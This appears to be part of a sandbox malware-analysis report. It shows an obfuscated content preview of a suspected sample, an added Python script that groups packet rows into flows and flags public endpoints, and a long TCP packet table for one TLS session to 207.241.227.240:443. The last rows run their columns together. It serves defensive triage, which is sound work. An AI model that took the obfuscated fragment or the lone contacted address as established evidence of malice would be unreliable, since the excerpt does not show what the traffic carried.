                                              File Content Preview:..Z.i.c.L.A.G.Z.c.d.k.t.i.k.T.G.k.n.U.g.k.i.I.O.f.L.b.C.O. .=. .".z.L.G.o.U.W.W.L.L.K.a.r.d.r.c.K.J.c.S.i.z.u.C.L.i.L.i.K.".....e.o.k.G.m.j.f.b.f.c.L.h.K.t.t.A.W.s.W.m.N.i.k.W.B.O.c.h. .=. .".h.K.z.O.U.N.W.Z.P.C.x.W.U.i.L.W.p.C.i.B.c.i.c.o.G.a.L.n.".....q
                                              Icon Hash:68d69b8f86ab9a86
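The TCP packet listing that follows is a per-packet dump of one TLS session from the sandbox host (192.168.2.11, ephemeral port 49705) to 207.241.227.240:443. When triaging a report like this, the useful reduction is from packets to flows: which external endpoints were contacted, how many packets went each way, and for how long. The script below is an added example and not part of the Joe Sandbox report; it parses the first ten rows of that table (copied into whitespace-separated columns and embedded as constructed sample input), groups them into flows and flags those whose server side is a public address. The "lower port is the server" rule is an assumption that holds for this kind of sandbox traffic, not a general truth.

```python
import ipaddress
import re
from datetime import datetime

# Constructed sample input: the first ten rows of the report's TCP packet
# table (192.168.2.11:49705 <-> 207.241.227.240:443), written out as
# whitespace-separated columns: timestamp, source port, dest port, source IP, dest IP.
SAMPLE_ROWS = """\
Oct 2, 2024 05:23:17.080085039 CEST  49705  443    192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.080148935 CEST  443    49705  207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.080319881 CEST  49705  443    192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.089349985 CEST  49705  443    192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.089376926 CEST  443    49705  207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.709038019 CEST  443    49705  207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.709115982 CEST  49705  443    192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.712883949 CEST  49705  443    192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.712899923 CEST  443    49705  207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.713148117 CEST  443    49705  207.241.227.240  192.168.2.11
"""

# The report prints nanosecond timestamps; strptime only handles microseconds,
# so the fractional part is captured separately and kept as an integer.
ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d{1,9}) \w+"
    r"\s+(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)\s*$"
)


def parse_row(line):
    """Turn one table row into a dict; the time is kept as (datetime, nanoseconds)."""
    m = ROW_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    base = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
    frac_ns = int(m["frac"].ljust(9, "0"))
    return {"t": (base, frac_ns), "sport": int(m["sport"]), "dport": int(m["dport"]),
            "src": m["src"], "dst": m["dst"]}


def elapsed_seconds(t0, t1):
    """Signed difference t1 - t0 in seconds, nanosecond fraction included."""
    (b0, f0), (b1, f1) = t0, t1
    return (b1 - b0).total_seconds() + (f1 - f0) / 1e9


def flow_key(pkt):
    """Normalise a packet to (client_ip, client_port, server_ip, server_port).

    Assumption: the endpoint with the lower port number is the server, which is
    good enough for sandbox traffic. Also returns whether the packet travels
    client -> server.
    """
    a = (pkt["src"], pkt["sport"])
    b = (pkt["dst"], pkt["dport"])
    client, server = (a, b) if a[1] > b[1] else (b, a)
    return client + server, a == client


def summarize_flows(text):
    """Group table rows into flows with per-direction packet counts and duration."""
    flows = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        pkt = parse_row(line)
        key, c2s = flow_key(pkt)
        f = flows.setdefault(key, {"c2s": 0, "s2c": 0, "first": pkt["t"], "last": pkt["t"]})
        f["c2s" if c2s else "s2c"] += 1
        if elapsed_seconds(f["first"], pkt["t"]) < 0:
            f["first"] = pkt["t"]
        if elapsed_seconds(f["last"], pkt["t"]) > 0:
            f["last"] = pkt["t"]
    for f in flows.values():
        f["duration_s"] = round(elapsed_seconds(f["first"], f["last"]), 9)
    return flows


def external_flows(flows):
    """Keys of flows whose server side is a public address: the pivot points for IOC work."""
    return [k for k in flows if not ipaddress.ip_address(k[2]).is_private]


if __name__ == "__main__":
    flows = summarize_flows(SAMPLE_ROWS)
    public = set(external_flows(flows))
    for key, f in flows.items():
        cip, cport, sip, sport = key
        tag = "EXTERNAL" if key in public else "internal"
        print(f"{cip}:{cport} -> {sip}:{sport}  c2s={f['c2s']} s2c={f['s2c']} "
              f"duration={f['duration_s']}s  [{tag}]")
```

On the ten sample rows this yields a single flow, five packets in each direction over about 0.63 s, whose server side 207.241.227.240 is public and therefore the address to pivot on. Run over the whole table, the same code separates the TLS session from any later connections the second stage opens.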
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 2, 2024 05:23:17.080085039 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.080148935 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.080319881 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.089349985 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.089376926 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.709038019 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.709115982 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.712883949 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.712899923 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.713148117 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.724313974 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:17.771403074 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.999876022 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.999907970 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:17.999924898 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.000053883 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.000081062 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.000149965 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.019471884 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.019491911 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.019763947 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.019784927 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.019836903 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.068098068 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.068123102 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.068240881 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.068269014 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.068312883 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.105003119 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.105021954 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.105190992 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.105223894 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.105334997 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.106077909 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.106105089 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.106182098 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.106195927 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.106209993 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.106246948 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.107759953 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.107775927 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.107834101 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.107841969 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.107882977 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.173161983 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.173187971 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.173314095 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.173347950 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.173847914 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.191658974 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.191682100 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.191787004 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.191801071 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.192064047 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.192608118 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.192625046 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.192677975 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.192683935 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.192725897 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.193068981 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.193576097 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.193593979 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.193659067 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.193666935 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.193787098 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.194643974 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.194665909 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.194705009 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.194710016 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.194746971 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.194792986 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.195511103 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.195528030 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.195585012 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.195590973 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.195843935 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.201643944 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.236058950 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.236085892 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.236429930 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.236457109 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.236587048 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.246931076 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.246949911 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.247020006 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.247033119 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.247087002 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.260055065 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.260077000 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.260179043 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.260198116 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.260282993 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.278362036 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.278387070 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.278573036 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.278593063 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.278645992 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.278981924 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.279002905 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.279083014 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.279083014 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.279093981 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.279145956 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.279524088 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.279541016 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.279602051 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.279608011 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.279640913 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.279767990 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.280148029 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.280169964 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.280211926 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.280217886 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.280247927 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.280280113 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.280478001 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.280502081 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.280558109 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.280565023 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.280600071 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.312311888 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.312346935 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.312450886 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.312493086 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.312782049 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.333549976 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.333570957 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.333750963 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.333775043 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.333832979 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.346494913 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.346513987 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.346607924 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.346621037 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.346702099 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.365420103 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.365437031 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.365546942 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.365569115 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.365616083 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.365936041 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.365952015 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.366043091 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.366050959 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.366118908 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.366436005 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.366451979 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.366503954 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.366512060 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.366540909 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.366570950 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.370167971 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.370183945 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.370280981 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.370294094 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.370335102 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.370531082 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.370552063 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.370614052 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.370623112 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.370671988 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.398907900 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.398926020 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.399048090 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.399063110 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.399106979 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.420059919 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.420078039 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.420205116 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.420227051 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.420295954 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.433255911 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.433271885 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.433443069 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.433458090 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.433562040 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452061892 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452083111 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452147961 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452158928 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452168941 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452260017 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452342033 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452358961 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452430964 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452438116 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452493906 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452753067 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452766895 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452862978 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.452871084 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.452955961 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.453134060 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.453155041 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.453191996 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.453200102 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.453238964 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.453269958 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.453495026 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.453511000 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.453587055 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.453593016 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.453664064 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.485541105 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.485560894 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.485663891 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.485677004 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.485764980 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.506757021 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.506773949 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.506880999 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.506906986 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.506947994 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.520056963 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.520071983 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.520198107 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.520210028 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.520374060 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.538669109 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.538686037 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.538753033 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.538772106 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:23:18.538804054 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.538837910 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:23:18.539053917 CEST  443          49705      207.241.227.240  192.168.2.11
                                              Oct 2, 2024 05:23:18.539069891 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539108038 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539122105 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539154053 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539210081 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539311886 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539330006 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539406061 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539416075 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539429903 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539472103 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539745092 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539764881 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539822102 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539830923 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.539851904 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.539869070 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.540126085 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.540143013 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.540219069 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.540229082 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.540333986 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.572365046 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.572384119 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.573219061 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.573240995 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.573489904 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.593441963 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.593457937 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.593561888 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.593612909 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.593676090 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.606657982 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.606673956 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.606713057 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.606782913 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.606791973 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.606890917 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.625825882 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.625849009 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.625912905 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.625926971 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626013994 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.626415968 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626434088 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626472950 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.626480103 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626514912 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.626539946 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.626919985 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626936913 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626971960 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.626979113 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.626996994 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.627017975 CEST49705443192.168.2.11207.241.227.240
